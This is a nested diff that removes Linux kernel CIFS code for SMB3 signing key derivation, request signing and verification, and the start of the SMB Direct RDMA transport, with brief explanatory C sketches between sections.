+-				SMB3_GCM128_CRYPTKEY_SIZE, ses->smb3encryptionkey);
+-		cifs_dbg(VFS, "ServerOut Key %*ph\n",
+-				SMB3_GCM128_CRYPTKEY_SIZE, ses->smb3decryptionkey);
+-	}
+-#endif
+-	return rc;
+-}
+-
+-int
+-generate_smb30signingkey(struct cifs_ses *ses,
+-			 struct TCP_Server_Info *server)
+-
+-{
+-	struct derivation_triplet triplet;
+-	struct derivation *d;
+-
+-	d = &triplet.signing;
+-	d->label.iov_base = "SMB2AESCMAC";
+-	d->label.iov_len = 12;
+-	d->context.iov_base = "SmbSign";
+-	d->context.iov_len = 8;
+-
+-	d = &triplet.encryption;
+-	d->label.iov_base = "SMB2AESCCM";
+-	d->label.iov_len = 11;
+-	d->context.iov_base = "ServerIn ";
+-	d->context.iov_len = 10;
+-
+-	d = &triplet.decryption;
+-	d->label.iov_base = "SMB2AESCCM";
+-	d->label.iov_len = 11;
+-	d->context.iov_base = "ServerOut";
+-	d->context.iov_len = 10;
+-
+-	return generate_smb3signingkey(ses, server, &triplet);
+-}
+-
+-int
+-generate_smb311signingkey(struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server)
+-
+-{
+-	struct derivation_triplet triplet;
+-	struct derivation *d;
+-
+-	d = &triplet.signing;
+-	d->label.iov_base = "SMBSigningKey";
+-	d->label.iov_len = 14;
+-	d->context.iov_base = ses->preauth_sha_hash;
+-	d->context.iov_len = 64;
+-
+-	d = &triplet.encryption;
+-	d->label.iov_base = "SMBC2SCipherKey";
+-	d->label.iov_len = 16;
+-	d->context.iov_base = ses->preauth_sha_hash;
+-	d->context.iov_len = 64;
+-
+-	d = &triplet.decryption;
+-	d->label.iov_base = "SMBS2CCipherKey";
+-	d->label.iov_len = 16;
+-	d->context.iov_base = ses->preauth_sha_hash;
+-	d->context.iov_len = 64;
+-
+-	return generate_smb3signingkey(ses, server, &triplet);
+-}
+-
+-int
+-smb3_calc_signature(struct smb_rqst *rqst, struct TCP_Server_Info *server,
+-			bool allocate_crypto)
+-{
+-	int rc;
+-	unsigned char smb3_signature[SMB2_CMACAES_SIZE];
+-	unsigned char *sigptr = smb3_signature;
+-	struct kvec *iov = rqst->rq_iov;
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)iov[0].iov_base;
+-	struct shash_desc *shash = NULL;
+-	struct smb_rqst drqst;
+-	u8 key[SMB3_SIGN_KEY_SIZE];
+-
+-	rc = smb2_get_sign_key(le64_to_cpu(shdr->SessionId), server, key);
+-	if (unlikely(rc)) {
+-		cifs_server_dbg(VFS, "%s: Could not get signing key\n", __func__);
+-		return rc;
+-	}
+-
+-	if (allocate_crypto) {
+-		rc = cifs_alloc_hash("cmac(aes)", &shash);
+-		if (rc)
+-			return rc;
+-	} else {
+-		shash = server->secmech.aes_cmac;
+-	}
+-
+-	memset(smb3_signature, 0x0, SMB2_CMACAES_SIZE);
+-	memset(shdr->Signature, 0x0, SMB2_SIGNATURE_SIZE);
+-
+-	rc = crypto_shash_setkey(shash->tfm, key, SMB2_CMACAES_SIZE);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not set key for cmac aes\n", __func__);
+-		goto out;
+-	}
+-
+-	/*
+-	 * we already allocate aes_cmac when we init smb3 signing key,
+-	 * so unlike smb2 case we do not have to check here if secmech are
+-	 * initialized
+-	 */
+-	rc = crypto_shash_init(shash);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not init cmac aes\n", __func__);
+-		goto out;
+-	}
+-
+-	/*
+-	 * For SMB2+, __cifs_calc_signature() expects to sign only the actual
+-	 * data, that is, iov[0] should not contain a rfc1002 length.
+-	 *
+-	 * Sign the rfc1002 length prior to passing the data (iov[1-N]) down to
+-	 * __cifs_calc_signature().
+-	 */
+-	drqst = *rqst;
+-	if (drqst.rq_nvec >= 2 && iov[0].iov_len == 4) {
+-		rc = crypto_shash_update(shash, iov[0].iov_base,
+-					 iov[0].iov_len);
+-		if (rc) {
+-			cifs_server_dbg(VFS, "%s: Could not update with payload\n",
+-				 __func__);
+-			goto out;
+-		}
+-		drqst.rq_iov++;
+-		drqst.rq_nvec--;
+-	}
+-
+-	rc = __cifs_calc_signature(&drqst, server, sigptr, shash);
+-	if (!rc)
+-		memcpy(shdr->Signature, sigptr, SMB2_SIGNATURE_SIZE);
+-
+-out:
+-	if (allocate_crypto)
+-		cifs_free_hash(&shash);
+-	return rc;
+-}
+-
+-/* must be called with server->srv_mutex held */
+-static int
+-smb2_sign_rqst(struct smb_rqst *rqst, struct TCP_Server_Info *server)
+-{
+-	int rc = 0;
+-	struct smb2_hdr *shdr;
+-	struct smb2_sess_setup_req *ssr;
+-	bool is_binding;
+-	bool is_signed;
+-
+-	shdr = (struct smb2_hdr *)rqst->rq_iov[0].iov_base;
+-	ssr = (struct smb2_sess_setup_req *)shdr;
+-
+-	is_binding = shdr->Command == SMB2_SESSION_SETUP &&
+-		(ssr->Flags & SMB2_SESSION_REQ_FLAG_BINDING);
+-	is_signed = shdr->Flags & SMB2_FLAGS_SIGNED;
+-
+-	if (!is_signed)
+-		return 0;
+-	spin_lock(&server->srv_lock);
+-	if (server->ops->need_neg &&
+-	    server->ops->need_neg(server)) {
+-		spin_unlock(&server->srv_lock);
+-		return 0;
+-	}
+-	spin_unlock(&server->srv_lock);
+-	if (!is_binding && !server->session_estab) {
+-		strncpy(shdr->Signature, "BSRSPYL", 8);
+-		return 0;
+-	}
+-
+-	rc = server->ops->calc_signature(rqst, server, false);
+-
+-	return rc;
+-}
+-
+-int
+-smb2_verify_signature(struct smb_rqst *rqst, struct TCP_Server_Info *server)
+-{
+-	unsigned int rc;
+-	char server_response_sig[SMB2_SIGNATURE_SIZE];
+-	struct smb2_hdr *shdr =
+-			(struct smb2_hdr *)rqst->rq_iov[0].iov_base;
+-
+-	if ((shdr->Command == SMB2_NEGOTIATE) ||
+-	    (shdr->Command == SMB2_SESSION_SETUP) ||
+-	    (shdr->Command == SMB2_OPLOCK_BREAK) ||
+-	    server->ignore_signature ||
+-	    (!server->session_estab))
+-		return 0;
+-
+-	/*
+-	 * BB what if signatures are supposed to be on for session but
+-	 * server does not send one? BB
+-	 */
+-
+-	/* Do not need to verify session setups with signature "BSRSPYL " */
+-	if (memcmp(shdr->Signature, "BSRSPYL ", 8) == 0)
+-		cifs_dbg(FYI, "dummy signature received for smb command 0x%x\n",
+-			 shdr->Command);
+-
+-	/*
+-	 * Save off the origiginal signature so we can modify the smb and check
+-	 * our calculated signature against what the server sent.
+-	 */
+-	memcpy(server_response_sig, shdr->Signature, SMB2_SIGNATURE_SIZE);
+-
+-	memset(shdr->Signature, 0, SMB2_SIGNATURE_SIZE);
+-
+-	rc = server->ops->calc_signature(rqst, server, true);
+-
+-	if (rc)
+-		return rc;
+-
+-	if (memcmp(server_response_sig, shdr->Signature, SMB2_SIGNATURE_SIZE)) {
+-		cifs_dbg(VFS, "sign fail cmd 0x%x message id 0x%llx\n",
+-			shdr->Command, shdr->MessageId);
+-		return -EACCES;
+-	} else
+-		return 0;
+-}
+-
+-/*
+- * Set message id for the request. Should be called after wait_for_free_request
+- * and when srv_mutex is held.
+- */
+-static inline void
+-smb2_seq_num_into_buf(struct TCP_Server_Info *server,
+-		      struct smb2_hdr *shdr)
+-{
+-	unsigned int i, num = le16_to_cpu(shdr->CreditCharge);
+-
+-	shdr->MessageId = get_next_mid64(server);
+-	/* skip message numbers according to CreditCharge field */
+-	for (i = 1; i < num; i++)
+-		get_next_mid(server);
+-}
+-
+-static struct mid_q_entry *
+-smb2_mid_entry_alloc(const struct smb2_hdr *shdr,
+-		     struct TCP_Server_Info *server)
+-{
+-	struct mid_q_entry *temp;
+-	unsigned int credits = le16_to_cpu(shdr->CreditCharge);
+-
+-	if (server == NULL) {
+-		cifs_dbg(VFS, "Null TCP session in smb2_mid_entry_alloc\n");
+-		return NULL;
+-	}
+-
+-	temp = mempool_alloc(cifs_mid_poolp, GFP_NOFS);
+-	memset(temp, 0, sizeof(struct mid_q_entry));
+-	kref_init(&temp->refcount);
+-	temp->mid = le64_to_cpu(shdr->MessageId);
+-	temp->credits = credits > 0 ? credits : 1;
+-	temp->pid = current->pid;
+-	temp->command = shdr->Command; /* Always LE */
+-	temp->when_alloc = jiffies;
+-	temp->server = server;
+-
+-	/*
+-	 * The default is for the mid to be synchronous, so the
+-	 * default callback just wakes up the current task.
+-	 */
+-	get_task_struct(current);
+-	temp->creator = current;
+-	temp->callback = cifs_wake_up_task;
+-	temp->callback_data = current;
+-
+-	atomic_inc(&mid_count);
+-	temp->mid_state = MID_REQUEST_ALLOCATED;
+-	trace_smb3_cmd_enter(le32_to_cpu(shdr->Id.SyncId.TreeId),
+-			     le64_to_cpu(shdr->SessionId),
+-			     le16_to_cpu(shdr->Command), temp->mid);
+-	return temp;
+-}
+-
+-static int
+-smb2_get_mid_entry(struct cifs_ses *ses, struct TCP_Server_Info *server,
+-		   struct smb2_hdr *shdr, struct mid_q_entry **mid)
+-{
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsExiting) {
+-		spin_unlock(&server->srv_lock);
+-		return -ENOENT;
+-	}
+-
+-	if (server->tcpStatus == CifsNeedReconnect) {
+-		spin_unlock(&server->srv_lock);
+-		cifs_dbg(FYI, "tcp session dead - return to caller to retry\n");
+-		return -EAGAIN;
+-	}
+-
+-	if (server->tcpStatus == CifsNeedNegotiate &&
+-	   shdr->Command != SMB2_NEGOTIATE) {
+-		spin_unlock(&server->srv_lock);
+-		return -EAGAIN;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	spin_lock(&ses->ses_lock);
+-	if (ses->ses_status == SES_NEW) {
+-		if ((shdr->Command != SMB2_SESSION_SETUP) &&
+-		    (shdr->Command != SMB2_NEGOTIATE)) {
+-			spin_unlock(&ses->ses_lock);
+-			return -EAGAIN;
+-		}
+-		/* else ok - we are setting up session */
+-	}
+-
+-	if (ses->ses_status == SES_EXITING) {
+-		if (shdr->Command != SMB2_LOGOFF) {
+-			spin_unlock(&ses->ses_lock);
+-			return -EAGAIN;
+-		}
+-		/* else ok - we are shutting down the session */
+-	}
+-	spin_unlock(&ses->ses_lock);
+-
+-	*mid = smb2_mid_entry_alloc(shdr, server);
+-	if (*mid == NULL)
+-		return -ENOMEM;
+-	spin_lock(&server->mid_lock);
+-	list_add_tail(&(*mid)->qhead, &server->pending_mid_q);
+-	spin_unlock(&server->mid_lock);
+-
+-	return 0;
+-}
+-
+-int
+-smb2_check_receive(struct mid_q_entry *mid, struct TCP_Server_Info *server,
+-		   bool log_error)
+-{
+-	unsigned int len = mid->resp_buf_size;
+-	struct kvec iov[1];
+-	struct smb_rqst rqst = { .rq_iov = iov,
+-				 .rq_nvec = 1 };
+-
+-	iov[0].iov_base = (char *)mid->resp_buf;
+-	iov[0].iov_len = len;
+-
+-	dump_smb(mid->resp_buf, min_t(u32, 80, len));
+-	/* convert the length into a more usable form */
+-	if (len > 24 && server->sign && !mid->decrypted) {
+-		int rc;
+-
+-		rc = smb2_verify_signature(&rqst, server);
+-		if (rc)
+-			cifs_server_dbg(VFS, "SMB signature verification returned error = %d\n",
+-				 rc);
+-	}
+-
+-	return map_smb2_to_linux_error(mid->resp_buf, log_error);
+-}
+-
+-struct mid_q_entry *
+-smb2_setup_request(struct cifs_ses *ses, struct TCP_Server_Info *server,
+-		   struct smb_rqst *rqst)
+-{
+-	int rc;
+-	struct smb2_hdr *shdr =
+-			(struct smb2_hdr *)rqst->rq_iov[0].iov_base;
+-	struct mid_q_entry *mid;
+-
+-	smb2_seq_num_into_buf(server, shdr);
+-
+-	rc = smb2_get_mid_entry(ses, server, shdr, &mid);
+-	if (rc) {
+-		revert_current_mid_from_hdr(server, shdr);
+-		return ERR_PTR(rc);
+-	}
+-
+-	rc = smb2_sign_rqst(rqst, server);
+-	if (rc) {
+-		revert_current_mid_from_hdr(server, shdr);
+-		delete_mid(mid);
+-		return ERR_PTR(rc);
+-	}
+-
+-	return mid;
+-}
+-
+-struct mid_q_entry *
+-smb2_setup_async_request(struct TCP_Server_Info *server, struct smb_rqst *rqst)
+-{
+-	int rc;
+-	struct smb2_hdr *shdr =
+-			(struct smb2_hdr *)rqst->rq_iov[0].iov_base;
+-	struct mid_q_entry *mid;
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsNeedNegotiate &&
+-	   shdr->Command != SMB2_NEGOTIATE) {
+-		spin_unlock(&server->srv_lock);
+-		return ERR_PTR(-EAGAIN);
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	smb2_seq_num_into_buf(server, shdr);
+-
+-	mid = smb2_mid_entry_alloc(shdr, server);
+-	if (mid == NULL) {
+-		revert_current_mid_from_hdr(server, shdr);
+-		return ERR_PTR(-ENOMEM);
+-	}
+-
+-	rc = smb2_sign_rqst(rqst, server);
+-	if (rc) {
+-		revert_current_mid_from_hdr(server, shdr);
+-		release_mid(mid);
+-		return ERR_PTR(rc);
+-	}
+-
+-	return mid;
+-}
+-
+-int
+-smb3_crypto_aead_allocate(struct TCP_Server_Info *server)
+-{
+-	struct crypto_aead *tfm;
+-
+-	if (!server->secmech.enc) {
+-		if ((server->cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
+-		    (server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+-			tfm = crypto_alloc_aead("gcm(aes)", 0, 0);
+-		else
+-			tfm = crypto_alloc_aead("ccm(aes)", 0, 0);
+-		if (IS_ERR(tfm)) {
+-			cifs_server_dbg(VFS, "%s: Failed alloc encrypt aead\n",
+-				 __func__);
+-			return PTR_ERR(tfm);
+-		}
+-		server->secmech.enc = tfm;
+-	}
+-
+-	if (!server->secmech.dec) {
+-		if ((server->cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
+-		    (server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+-			tfm = crypto_alloc_aead("gcm(aes)", 0, 0);
+-		else
+-			tfm = crypto_alloc_aead("ccm(aes)", 0, 0);
+-		if (IS_ERR(tfm)) {
+-			crypto_free_aead(server->secmech.enc);
+-			server->secmech.enc = NULL;
+-			cifs_server_dbg(VFS, "%s: Failed to alloc decrypt aead\n",
+-				 __func__);
+-			return PTR_ERR(tfm);
+-		}
+-		server->secmech.dec = tfm;
+-	}
+-
+-	return 0;
+-}
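The allocator above derives the AEAD algorithm name purely from the negotiated cipher type: both GCM ciphers map to "gcm(aes)", everything else to "ccm(aes)". A sketch of that mapping with the cipher constants reduced to plain enumerators:

#include <stdio.h>

enum smb_cipher { CIPHER_AES128_CCM, CIPHER_AES128_GCM,
		  CIPHER_AES256_CCM, CIPHER_AES256_GCM };

/* Mirror of the selection logic above, outside the crypto API. */
static const char *aead_name(enum smb_cipher c)
{
	if (c == CIPHER_AES128_GCM || c == CIPHER_AES256_GCM)
		return "gcm(aes)";
	return "ccm(aes)";
}

int main(void)
{
	printf("%s\n", aead_name(CIPHER_AES256_GCM)); /* gcm(aes) */
	printf("%s\n", aead_name(CIPHER_AES128_CCM)); /* ccm(aes) */
	return 0;
}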
+diff --git a/fs/cifs/smbdirect.c b/fs/cifs/smbdirect.c
+deleted file mode 100644
+index cf923f211c512..0000000000000
+--- a/fs/cifs/smbdirect.c
++++ /dev/null
+@@ -1,2494 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2017, Microsoft Corporation.
+- *
+- *   Author(s): Long Li <longli@microsoft.com>
+- */
+-#include <linux/module.h>
+-#include <linux/highmem.h>
+-#include "smbdirect.h"
+-#include "cifs_debug.h"
+-#include "cifsproto.h"
+-#include "smb2proto.h"
+-
+-static struct smbd_response *get_empty_queue_buffer(
+-		struct smbd_connection *info);
+-static struct smbd_response *get_receive_buffer(
+-		struct smbd_connection *info);
+-static void put_receive_buffer(
+-		struct smbd_connection *info,
+-		struct smbd_response *response);
+-static int allocate_receive_buffers(struct smbd_connection *info, int num_buf);
+-static void destroy_receive_buffers(struct smbd_connection *info);
+-
+-static void put_empty_packet(
+-		struct smbd_connection *info, struct smbd_response *response);
+-static void enqueue_reassembly(
+-		struct smbd_connection *info,
+-		struct smbd_response *response, int data_length);
+-static struct smbd_response *_get_first_reassembly(
+-		struct smbd_connection *info);
+-
+-static int smbd_post_recv(
+-		struct smbd_connection *info,
+-		struct smbd_response *response);
+-
+-static int smbd_post_send_empty(struct smbd_connection *info);
+-static int smbd_post_send_data(
+-		struct smbd_connection *info,
+-		struct kvec *iov, int n_vec, int remaining_data_length);
+-static int smbd_post_send_page(struct smbd_connection *info,
+-		struct page *page, unsigned long offset,
+-		size_t size, int remaining_data_length);
+-
+-static void destroy_mr_list(struct smbd_connection *info);
+-static int allocate_mr_list(struct smbd_connection *info);
+-
+-/* SMBD version number */
+-#define SMBD_V1	0x0100
+-
+-/* Port numbers for SMBD transport */
+-#define SMB_PORT	445
+-#define SMBD_PORT	5445
+-
+-/* Address lookup and resolve timeout in ms */
+-#define RDMA_RESOLVE_TIMEOUT	5000
+-
+-/* SMBD negotiation timeout in seconds */
+-#define SMBD_NEGOTIATE_TIMEOUT	120
+-
+-/* SMBD minimum receive size and fragmented size defined in [MS-SMBD] */
+-#define SMBD_MIN_RECEIVE_SIZE		128
+-#define SMBD_MIN_FRAGMENTED_SIZE	131072
+-
+-/*
+- * Default maximum number of RDMA read/write outstanding on this connection
+- * This value is possibly decreased during QP creation on hardware limit
+- */
+-#define SMBD_CM_RESPONDER_RESOURCES	32
+-
+-/* Maximum number of retries on data transfer operations */
+-#define SMBD_CM_RETRY			6
+-/* No need to retry on Receiver Not Ready since SMBD manages credits */
+-#define SMBD_CM_RNR_RETRY		0
+-
+-/*
+- * User configurable initial values per SMBD transport connection
+- * as defined in [MS-SMBD] 3.1.1.1
+- * Those may change after a SMBD negotiation
+- */
+-/* The local peer's maximum number of credits to grant to the peer */
+-int smbd_receive_credit_max = 255;
+-
+-/* The number of credits the remote peer requests of the local peer */
+-int smbd_send_credit_target = 255;
+-
+-/* The maximum single-message size that can be sent to the remote peer */
+-int smbd_max_send_size = 1364;
+-
+-/*  The maximum fragmented upper-layer payload receive size supported */
+-int smbd_max_fragmented_recv_size = 1024 * 1024;
+-
+-/*  The maximum single-message size which can be received */
+-int smbd_max_receive_size = 1364;
+-
+-/* The timeout to initiate send of a keepalive message on idle */
+-int smbd_keep_alive_interval = 120;
+-
+-/*
+- * User configurable initial values for RDMA transport
+- * The actual values used may be lower and are limited to hardware capabilities
+- */
+-/* Default maximum number of pages in a single RDMA write/read */
+-int smbd_max_frmr_depth = 2048;
+-
+-/* If payload is less than this many bytes, use RDMA send/recv not read/write */
+-int rdma_readwrite_threshold = 4096;
+-
+-/* Transport logging functions
+- * Logging is defined as classes. They can be OR'ed to define the actual
+- * logging level via module parameter smbd_logging_class
+- * e.g. cifs.smbd_logging_class=0xa0 will log all log_rdma_recv() and
+- * log_rdma_event()
+- */
+-#define LOG_OUTGOING			0x1
+-#define LOG_INCOMING			0x2
+-#define LOG_READ			0x4
+-#define LOG_WRITE			0x8
+-#define LOG_RDMA_SEND			0x10
+-#define LOG_RDMA_RECV			0x20
+-#define LOG_KEEP_ALIVE			0x40
+-#define LOG_RDMA_EVENT			0x80
+-#define LOG_RDMA_MR			0x100
+-static unsigned int smbd_logging_class;
+-module_param(smbd_logging_class, uint, 0644);
+-MODULE_PARM_DESC(smbd_logging_class,
+-	"Logging class for SMBD transport 0x0 to 0x100");
+-
+-#define ERR		0x0
+-#define INFO		0x1
+-static unsigned int smbd_logging_level = ERR;
+-module_param(smbd_logging_level, uint, 0644);
+-MODULE_PARM_DESC(smbd_logging_level,
+-	"Logging level for SMBD transport, 0 (default): error, 1: info");
+-
+-#define log_rdma(level, class, fmt, args...)				\
+-do {									\
+-	if (level <= smbd_logging_level || class & smbd_logging_class)	\
+-		cifs_dbg(VFS, "%s:%d " fmt, __func__, __LINE__, ##args);\
+-} while (0)
+-
+-#define log_outgoing(level, fmt, args...) \
+-		log_rdma(level, LOG_OUTGOING, fmt, ##args)
+-#define log_incoming(level, fmt, args...) \
+-		log_rdma(level, LOG_INCOMING, fmt, ##args)
+-#define log_read(level, fmt, args...)	log_rdma(level, LOG_READ, fmt, ##args)
+-#define log_write(level, fmt, args...)	log_rdma(level, LOG_WRITE, fmt, ##args)
+-#define log_rdma_send(level, fmt, args...) \
+-		log_rdma(level, LOG_RDMA_SEND, fmt, ##args)
+-#define log_rdma_recv(level, fmt, args...) \
+-		log_rdma(level, LOG_RDMA_RECV, fmt, ##args)
+-#define log_keep_alive(level, fmt, args...) \
+-		log_rdma(level, LOG_KEEP_ALIVE, fmt, ##args)
+-#define log_rdma_event(level, fmt, args...) \
+-		log_rdma(level, LOG_RDMA_EVENT, fmt, ##args)
+-#define log_rdma_mr(level, fmt, args...) \
+-		log_rdma(level, LOG_RDMA_MR, fmt, ##args)
+-
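To make the gating in log_rdma() concrete: a message is emitted when its level is at or below smbd_logging_level, or when its class bit is set in smbd_logging_class, so 0xa0 selects LOG_RDMA_RECV | LOG_RDMA_EVENT as the comment above notes. A user-space sketch of the same gate:

#include <stdio.h>

#define LOG_RDMA_RECV	0x20
#define LOG_RDMA_EVENT	0x80
#define LOG_READ	0x4

static unsigned int logging_class = LOG_RDMA_RECV | LOG_RDMA_EVENT; /* 0xa0 */
static unsigned int logging_level; /* 0: errors only */

#define log_rdma(level, class, fmt, args...)				\
do {									\
	if ((level) <= logging_level || ((class) & logging_class))	\
		fprintf(stderr, "%s:%d " fmt, __func__, __LINE__, ##args); \
} while (0)

int main(void)
{
	log_rdma(1, LOG_RDMA_EVENT, "emitted: class bit is set\n");
	log_rdma(1, LOG_READ, "suppressed: level too high, class unset\n");
	return 0;
}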
+-static void smbd_disconnect_rdma_work(struct work_struct *work)
+-{
+-	struct smbd_connection *info =
+-		container_of(work, struct smbd_connection, disconnect_work);
+-
+-	if (info->transport_status == SMBD_CONNECTED) {
+-		info->transport_status = SMBD_DISCONNECTING;
+-		rdma_disconnect(info->id);
+-	}
+-}
+-
+-static void smbd_disconnect_rdma_connection(struct smbd_connection *info)
+-{
+-	queue_work(info->workqueue, &info->disconnect_work);
+-}
+-
+-/* Upcall from RDMA CM */
+-static int smbd_conn_upcall(
+-		struct rdma_cm_id *id, struct rdma_cm_event *event)
+-{
+-	struct smbd_connection *info = id->context;
+-
+-	log_rdma_event(INFO, "event=%d status=%d\n",
+-		event->event, event->status);
+-
+-	switch (event->event) {
+-	case RDMA_CM_EVENT_ADDR_RESOLVED:
+-	case RDMA_CM_EVENT_ROUTE_RESOLVED:
+-		info->ri_rc = 0;
+-		complete(&info->ri_done);
+-		break;
+-
+-	case RDMA_CM_EVENT_ADDR_ERROR:
+-		info->ri_rc = -EHOSTUNREACH;
+-		complete(&info->ri_done);
+-		break;
+-
+-	case RDMA_CM_EVENT_ROUTE_ERROR:
+-		info->ri_rc = -ENETUNREACH;
+-		complete(&info->ri_done);
+-		break;
+-
+-	case RDMA_CM_EVENT_ESTABLISHED:
+-		log_rdma_event(INFO, "connected event=%d\n", event->event);
+-		info->transport_status = SMBD_CONNECTED;
+-		wake_up_interruptible(&info->conn_wait);
+-		break;
+-
+-	case RDMA_CM_EVENT_CONNECT_ERROR:
+-	case RDMA_CM_EVENT_UNREACHABLE:
+-	case RDMA_CM_EVENT_REJECTED:
+-		log_rdma_event(INFO, "connecting failed event=%d\n", event->event);
+-		info->transport_status = SMBD_DISCONNECTED;
+-		wake_up_interruptible(&info->conn_wait);
+-		break;
+-
+-	case RDMA_CM_EVENT_DEVICE_REMOVAL:
+-	case RDMA_CM_EVENT_DISCONNECTED:
+-		/* This happens when we fail the negotiation */
+-		if (info->transport_status == SMBD_NEGOTIATE_FAILED) {
+-			info->transport_status = SMBD_DISCONNECTED;
+-			wake_up(&info->conn_wait);
+-			break;
+-		}
+-
+-		info->transport_status = SMBD_DISCONNECTED;
+-		wake_up_interruptible(&info->disconn_wait);
+-		wake_up_interruptible(&info->wait_reassembly_queue);
+-		wake_up_interruptible_all(&info->wait_send_queue);
+-		break;
+-
+-	default:
+-		break;
+-	}
+-
+-	return 0;
+-}
+-
+-/* Upcall from RDMA QP */
+-static void
+-smbd_qp_async_error_upcall(struct ib_event *event, void *context)
+-{
+-	struct smbd_connection *info = context;
+-
+-	log_rdma_event(ERR, "%s on device %s info %p\n",
+-		ib_event_msg(event->event), event->device->name, info);
+-
+-	switch (event->event) {
+-	case IB_EVENT_CQ_ERR:
+-	case IB_EVENT_QP_FATAL:
+-		smbd_disconnect_rdma_connection(info);
+-		break;
+-
+-	default:
+-		break;
+-	}
+-}
+-
+-static inline void *smbd_request_payload(struct smbd_request *request)
+-{
+-	return (void *)request->packet;
+-}
+-
+-static inline void *smbd_response_payload(struct smbd_response *response)
+-{
+-	return (void *)response->packet;
+-}
+-
+-/* Called when a RDMA send is done */
+-static void send_done(struct ib_cq *cq, struct ib_wc *wc)
+-{
+-	int i;
+-	struct smbd_request *request =
+-		container_of(wc->wr_cqe, struct smbd_request, cqe);
+-
+-	log_rdma_send(INFO, "smbd_request 0x%p completed wc->status=%d\n",
+-		request, wc->status);
+-
+-	if (wc->status != IB_WC_SUCCESS || wc->opcode != IB_WC_SEND) {
+-		log_rdma_send(ERR, "wc->status=%d wc->opcode=%d\n",
+-			wc->status, wc->opcode);
+-		smbd_disconnect_rdma_connection(request->info);
+-	}
+-
+-	for (i = 0; i < request->num_sge; i++)
+-		ib_dma_unmap_single(request->info->id->device,
+-			request->sge[i].addr,
+-			request->sge[i].length,
+-			DMA_TO_DEVICE);
+-
+-	if (atomic_dec_and_test(&request->info->send_pending))
+-		wake_up(&request->info->wait_send_pending);
+-
+-	wake_up(&request->info->wait_post_send);
+-
+-	mempool_free(request, request->info->request_mempool);
+-}
+-
+-static void dump_smbd_negotiate_resp(struct smbd_negotiate_resp *resp)
+-{
+-	log_rdma_event(INFO, "resp message min_version %u max_version %u negotiated_version %u credits_requested %u credits_granted %u status %u max_readwrite_size %u preferred_send_size %u max_receive_size %u max_fragmented_size %u\n",
+-		       resp->min_version, resp->max_version,
+-		       resp->negotiated_version, resp->credits_requested,
+-		       resp->credits_granted, resp->status,
+-		       resp->max_readwrite_size, resp->preferred_send_size,
+-		       resp->max_receive_size, resp->max_fragmented_size);
+-}
+-
+-/*
+- * Process a negotiation response message, according to [MS-SMBD]3.1.5.7
+- * response, packet_length: the negotiation response message
+- * return value: true if negotiation is a success, false if failed
+- */
+-static bool process_negotiation_response(
+-		struct smbd_response *response, int packet_length)
+-{
+-	struct smbd_connection *info = response->info;
+-	struct smbd_negotiate_resp *packet = smbd_response_payload(response);
+-
+-	if (packet_length < sizeof(struct smbd_negotiate_resp)) {
+-		log_rdma_event(ERR,
+-			"error: packet_length=%d\n", packet_length);
+-		return false;
+-	}
+-
+-	if (le16_to_cpu(packet->negotiated_version) != SMBD_V1) {
+-		log_rdma_event(ERR, "error: negotiated_version=%x\n",
+-			le16_to_cpu(packet->negotiated_version));
+-		return false;
+-	}
+-	info->protocol = le16_to_cpu(packet->negotiated_version);
+-
+-	if (packet->credits_requested == 0) {
+-		log_rdma_event(ERR, "error: credits_requested==0\n");
+-		return false;
+-	}
+-	info->receive_credit_target = le16_to_cpu(packet->credits_requested);
+-
+-	if (packet->credits_granted == 0) {
+-		log_rdma_event(ERR, "error: credits_granted==0\n");
+-		return false;
+-	}
+-	atomic_set(&info->send_credits, le16_to_cpu(packet->credits_granted));
+-
+-	atomic_set(&info->receive_credits, 0);
+-
+-	if (le32_to_cpu(packet->preferred_send_size) > info->max_receive_size) {
+-		log_rdma_event(ERR, "error: preferred_send_size=%d\n",
+-			le32_to_cpu(packet->preferred_send_size));
+-		return false;
+-	}
+-	info->max_receive_size = le32_to_cpu(packet->preferred_send_size);
+-
+-	if (le32_to_cpu(packet->max_receive_size) < SMBD_MIN_RECEIVE_SIZE) {
+-		log_rdma_event(ERR, "error: max_receive_size=%d\n",
+-			le32_to_cpu(packet->max_receive_size));
+-		return false;
+-	}
+-	info->max_send_size = min_t(int, info->max_send_size,
+-					le32_to_cpu(packet->max_receive_size));
+-
+-	if (le32_to_cpu(packet->max_fragmented_size) <
+-			SMBD_MIN_FRAGMENTED_SIZE) {
+-		log_rdma_event(ERR, "error: max_fragmented_size=%d\n",
+-			le32_to_cpu(packet->max_fragmented_size));
+-		return false;
+-	}
+-	info->max_fragmented_send_size =
+-		le32_to_cpu(packet->max_fragmented_size);
+-	info->rdma_readwrite_threshold =
+-		rdma_readwrite_threshold > info->max_fragmented_send_size ?
+-		info->max_fragmented_send_size :
+-		rdma_readwrite_threshold;
+-
+-
+-	info->max_readwrite_size = min_t(u32,
+-			le32_to_cpu(packet->max_readwrite_size),
+-			info->max_frmr_depth * PAGE_SIZE);
+-	info->max_frmr_depth = info->max_readwrite_size / PAGE_SIZE;
+-
+-	return true;
+-}
+-
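One detail of the negotiation handler above that is easy to miss: max_readwrite_size is clamped to max_frmr_depth pages, and the depth is then recomputed from the clamped size. A small arithmetic sketch, assuming 4 KiB pages:

#include <stdint.h>
#include <stdio.h>

#define PAGE_SZ 4096u	/* assumption: 4 KiB pages */

int main(void)
{
	uint32_t peer_max_readwrite = 16u * 1024 * 1024; /* peer offers 16 MiB */
	uint32_t max_frmr_depth = 2048;			 /* local default */
	uint32_t frmr_bound = max_frmr_depth * PAGE_SZ;	 /* 8 MiB cap */

	uint32_t max_readwrite = peer_max_readwrite < frmr_bound ?
				 peer_max_readwrite : frmr_bound;
	max_frmr_depth = max_readwrite / PAGE_SZ;

	/* Prints 8388608 and 2048: the FRMR depth bounds the transfer size. */
	printf("max_readwrite=%u depth=%u\n", max_readwrite, max_frmr_depth);
	return 0;
}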
